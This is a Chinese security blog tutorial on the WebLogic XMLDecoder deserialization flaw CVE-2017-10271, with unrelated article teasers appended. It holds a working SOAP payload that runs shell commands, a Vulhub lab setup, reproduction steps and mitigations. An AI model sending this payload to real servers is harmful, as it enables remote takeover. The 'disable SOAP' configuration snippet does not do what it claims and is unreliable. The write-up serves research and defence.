WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)深度解析与实战复现

devtools/2025/3/19 2:51:25/

0x00 漏洞概述

CVE-2017-10271 是Oracle WebLogic Server WLS Security组件中的远程代码执行漏洞。攻击者通过构造恶意XML请求,利用XMLDecoder反序列化机制绕过安全验证,最终实现服务器权限接管

影响版本

  • WebLogic 10.3.6.0
  • WebLogic 12.1.3.0
  • WebLogic 12.2.1.0~12.2.1.2

漏洞危害

  • 远程代码执行(RCE):直接获取服务器Shell
  • 数据泄露:读取数据库配置、密钥等敏感信息
  • 横向渗透:作为跳板攻击内网其他系统

0x01 漏洞原理

技术背景

WebLogic的wls-wsat组件(Web Services Atomic Transaction)用于处理SOAP协议请求,其核心流程如下:

SOAP Request → XMLDecoder解析 → 实例化Java对象 → 执行操作

漏洞触发点在于XMLDecoder未对反序列化内容做安全过滤,导致攻击者可通过恶意XML注入任意Java代码。

关键代码分析

漏洞位于wls-wsat.war!/CoordinatorPortType.java

public void processXML(XMLStreamReader xmlReader) {XMLDecoder decoder = new XMLDecoder(xmlReader); // 未校验输入直接反序列化Object obj = decoder.readObject();              // 恶意对象被实例化invokeBusinessLogic(obj);                       // 触发恶意逻辑
}

攻击载荷构造

利用java.lang.ProcessBuilder执行系统命令的典型XML结构:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>touch /tmp/pwned</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

0x02 环境搭建

实验环境

组件版本
Docker20.10+
Vulhub靶场weblogic/CVE-2017-10271
攻击机Kali Linux 2023

一键启动漏洞环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d

访问 http://your-ip:7001 确认WebLogic控制台正常加载。


0x03 漏洞复现

步骤1:检测漏洞端点

发送探测请求到/wls-wsat/CoordinatorPortType端点:

curl -X GET http://target:7001/wls-wsat/CoordinatorPortType

若返回HTTP 200且包含WS-AtomicTransaction字样,则存在漏洞。

步骤2:构造RCE攻击

使用Burp Suite发送恶意SOAP请求:

  1. 请求路径POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Content-Typetext/xml
  3. Payload:替换XML中的<string>touch /tmp/pwned</string>为任意命令

步骤3:验证执行结果

进入Docker容器检查命令是否执行:

docker exec -it <container-id> /bin/bash
ls -l /tmp/pwned  # 查看文件是否创建成功

0x04 修复方案

临时缓解

  1. 删除wls-wsat组件:
    rm -rf /weblogic/path/servers/AdminServer/tmp/_WL_internal/wls-wsat
    
  2. 禁用SOAP协议:
    <!-- 修改weblogic.xml -->
    <container-descriptor><index-directory-enabled>false</index-directory-enabled>
    </container-descriptor>
    

官方补丁

升级至WebLogic 10.3.6.0.21110712.2.1.4.211107 及以上版本。

长期防御

  • 输入过滤:对XML内容进行白名单校验
  • 权限隔离:WebLogic进程以低权限用户运行
  • 流量监控:使用WAF拦截异常SOAP请求

0x05 防御思考

此漏洞暴露了反序列化信任边界的致命缺陷。开发过程中应遵循:

  1. 最小化反序列化接口暴露
  2. 采用安全的序列化协议(如JSON、Protobuf)
  3. 强制签名验证关键数据

参考资源

  • Oracle官方公告
  • CVE-2017-10271漏洞分析报告
  • WebLogic加固指南

实验声明:本文仅用于网络安全研究,请在合法授权环境下进行测试!


http://www.ppmy.cn/devtools/168218.html

相关文章

第十五届蓝桥杯C/C++B组拔河问题详解

解题思路 这道题目的难点在于枚举所有区间&#xff0c;并且区间不能重合&#xff0c;那么这样感觉就很难了。但是用下面这种方法就会好很多。 我们只需要将左边的所有区间的各种和放在一个set中&#xff0c;然后我们在枚举右边的所有区间的和去和它进行比较&#xff0c;然后…

基于图神经网络(GNN)的节点分类实战:从GCN到GraphSAGE

图神经网络(GNN)是一种专门用于处理图结构数据的深度学习模型,广泛应用于社交网络分析、推荐系统和生物信息学等领域。图卷积网络(GCN)是GNN的经典方法,而GraphSAGE则通过引入采样机制进一步提升了其性能。本文将通过一个完整的实战案例,展示如何使用GCN和GraphSAGE对图…

基于CNN的多种类蝴蝶图像分类

基于CNN的多种类蝴蝶图像分类&#x1f98b; 基于卷积神经网络对64992786张图像&#xff0c;75种不同类别的蝴蝶进行可视化分析、模型训练及分类展示 导入库 import pandas as pd import os import matplotlib.pyplot as plt import seaborn as sns import numpy as np from …

Android第三次面试(Java基础)

面试题一&#xff1a;在 Android 里&#xff0c;Array 和 ArrayList 区别&#xff1f; 定义与大小&#xff1a;数组声明时要指定大小&#xff0c;之后固定&#xff1b;ArrayList 动态&#xff0c;无需提前定大小。性能&#xff1a;二者访问元素快&#xff0c;时间复杂度 O(1)&…

vue/react/vite前端项目打包的时候加上时间最简单版本,防止后端扯皮

如果你是vite项目&#xff0c;直接写一个vite的插件&#xff0c;通过这个插件可以动态注入环境变量&#xff0c;然后当打包的时候&#xff0c;自动注入这个时间到环境变量中&#xff0c;然后在项目中App.vue中或者Main.tsx中打印出来&#xff0c;这就知道是什么时候编译的项目了…

C51 Proteus仿真实验17:数码管显示4×4键盘矩阵按键

说明 按下任意键时&#xff0c;数码管都会显示其键的序号&#xff0c;扫描程序首先判断按键发生在哪一列&#xff0c;然后根据所发生的行附加不同的值&#xff0c;从而得到按键的序号 Proteus仿真 注意&#xff1a; K0、K4、K8、KC右边引脚连接的是P1.0 K1、K5、K9、KD右边引…

通向AGI的未来之路!首篇2D/视频/3D/4D统一生成框架全景综述(港科大中山等)

文章链接&#xff1a; https://arxiv.org/pdf/2503.04641 摘要 理解并复现现实世界是人工通用智能&#xff08;AGI&#xff09;研究中的一个关键挑战。为实现这一目标&#xff0c;许多现有方法&#xff08;例如世界模型&#xff09;旨在捕捉支配物理世界的基本原理&#xff0…

使用Ajax技术进行动态网页的爬虫(pycharm)

Ajax&#xff08;Asynchronous JavaScript and XML&#xff09;技术在现代Web开发中广泛应用。 它允许网页在不重新加载整个页面的情况下&#xff0c;通过JavaScript与服务器进行异步通信&#xff0c;动态更新部分内容。这种技术对爬虫的功能和作用产生了显著影响&#xff0c;…